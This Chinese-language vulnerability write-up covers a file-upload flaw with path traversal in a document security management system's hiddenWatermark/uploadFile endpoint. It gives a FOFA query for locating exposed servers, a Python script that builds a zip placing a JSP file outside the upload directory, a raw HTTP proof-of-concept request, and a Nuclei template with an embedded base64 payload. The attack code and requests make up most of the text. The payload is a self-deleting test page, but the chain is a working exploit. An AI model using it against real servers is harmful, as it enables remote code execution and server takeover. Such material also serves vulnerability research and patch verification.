亿某通电子文档安全管理系统 hiddenWatermark-uploadFile 文件上传漏洞 ...

免责声明：文章泉源互联网网络整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的结果及损失，均由利用者本人负责，所产生的统统不良结果与文章作者无关。该文章仅供学习用途利用。
Ⅰ、漏洞描述
亿某通新一代电子文档安全管理系统（简称：CDG）是一款融合文档加密、数据分类分级、访问控制、关联分析、大数据分析、智能辨认等焦点技术的综合性数据智能安全产物。产物包括透明加密、智能加密、权限文档、数据分类分级、终端安全管理、文件外发管理、集团管控、数据安全网关、加解密接口中心件、U盘客户端十大焦点组件，掩护范围涵盖终端电脑（Windows、Mac和Linux系统平台）、智能终端（Android、IOS）以及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等），能够对企业焦点数据资产从生产、存储、流转、外发到烧毁进行全生命周期掩护。通过对“有意”、“无意”两种数据泄漏行为作统一防护，采用“事前主动防御，事中实时控制，事后实时追踪，全面防止泄密”的设计理念，共同身份辨别、数据分类、密级标识、权限控制、应用集成、安全接入、风险预警以及行为审计等能力，全方位保障用户终端数据安全。
亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞，恶意攻击者可能上传恶意文件进而获取服务器的控制权限
漏洞成因：恶意攻击者可以通过特定方式将文件上传到服务器的特定位置，获取系统权限，数据包中可能包罗明显的目录遍历陈迹，如利用…/等路径。攻击者通过这种方式实行读取任意文件。
漏洞危害：恶意攻击者可能会利用此漏洞在服务器上执行恶意代码文件，或者上传执行勒索软件，导致数据泄漏。

Ⅱ、fofa语句

1. body="/CDGServer3/index.jsp"

复制代码

Ⅲ、漏洞复现
1、利用py文件构造压缩包脚本

1. import zipfile
3. def tests(evil_file_name, zip_data):
4.     with zipfile.ZipFile(evil_file_name, 'w') as zip_file:
5.         for key, value in zip_data.items():
6.             print("Key:", key)
8.             # 重命名文件
9.             zip_info = zipfile.ZipInfo(key)
10.             zip_info.compress_type = zipfile.ZIP_DEFLATED
11.             zip_file.writestr(zip_info, value)
13. # 定义 zipData 字典
14. zip_data = {
15.     "../../../js/ceshi.jsp": "<%\n out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>",
16.     "theme/theme/theme1.xml": "<!--{"FileName":"aaa","FileSize":"222","UserName":"aa","Department":"aa","UserID":"aa","time":"123"}-->"
17. }
19. try:
20.     tests("ceshi.zip", zip_data)
21. except Exception as e:
22.     print(e)

复制代码

2、天生压缩包文件

POC

1. POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
2. Host: 127.0.0.1
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
4. like Gecko) Chrome/120.0.0.0 Safari/537.36
5. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
6. Accept:
7. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
8. */*;q=0.8,application/signed-exchange;v=b3;q=0.7
9. Accept-Encoding: gzip, deflate, br
10. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
11. Connection: close
13. ------WebKitFormBoundary3lm0J8uEuFHxy191
14. Content-Disposition: form-data; name="doc"; filename="ceshi.zip"
15. Content-Type: application/zip
17. {{file(压缩包文件路径)}}
18. ------WebKitFormBoundary3lm0J8uEuFHxy191--

复制代码

1、构建poc

2、访问

1. https://127.0.0.1/CDGServer3/上传文件路径
2. https://127.0.0.1/CDGServer3/js/ceshi.jsp

复制代码

Ⅳ、Nuclei-POC

1. id: CDG-hiddenWatermark-uploadFile-uploadfileinfo:  name: 亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞 攻击者可通过该漏洞在服务器端任意执行代码 写入后门， 获取服务器权限 进而控制整个 web 服务器  author: WLF  severity: high  metadata:     fofa-query: body="/CDGServer3/index.jsp"
2. variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Content-Length: 0        ------WebKitFormBoundary3lm0J8uEuFHxy191        Content-Disposition: form-data; name="doc"; filename="{{filename}}.zip"        Content-Type: application/zip                {{base64_decode("UEsDBBQAAAAIAAAAIQD5T26PZgAAAHAAAAAVAAAALi4vLi4vLi4vanMvY2VzaGkuanNwHcgxDsIwDAXQnVOESpXixRcoYkSMCAZmq/0CIysOqVuuD2V879Dvki/BtWkJK7k7w8zT3ZtN+46Ggk96ySqszic1ZKnVdJRQL/xAXCF2kXjmhveCOba7oa2G+DcR8YSfkGlI/fELUEsDBBQAAAAIAAAAIQDGTjiHSQAAAGcAAAAWAAAAdGhlbWUvdGhlbWUvdGhlbWUxLnhtbLNR1NWtVnLLzEn1S8xNVbJSSkxMVNIBCwRnVoEEjIyMgAKhxalFcBVAvktqQWJRSW5qXglMBKTC0wXGK8kEqzU0Mlaq1dW1AwBQSwECFAAUAAAACAAAACEA+U9uj2YAAABwAAAAFQAAAAAAAAAAAAAAgAEAAAAALi4vLi4vLi4vanMvY2VzaGkuanNwUEsBAhQAFAAAAAgAAAAhAMZOOIdJAAAAZwAAABYAAAAAAAAAAAAAAIABmQAAAHRoZW1lL3RoZW1lL3RoZW1lMS54bWxQSwUGAAAAAAIAAgCHAAAAFgEAAAAA")}}        ------WebKitFormBoundary3lm0J8uEuFHxy191--              - |        GET /CDGServer3/js/ceshi.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")

复制代码

Ⅴ、修复发起
升级至安全版本
网络安全工程师(白帽子)企业级学习路线

第一阶段：安全基础（入门）

第二阶段：Web渗透（初级网安工程师）

第三阶段：进阶部分（中级网络安全工程师）

假如你对网络安全入门感兴趣，那么你必要的话可以点击这里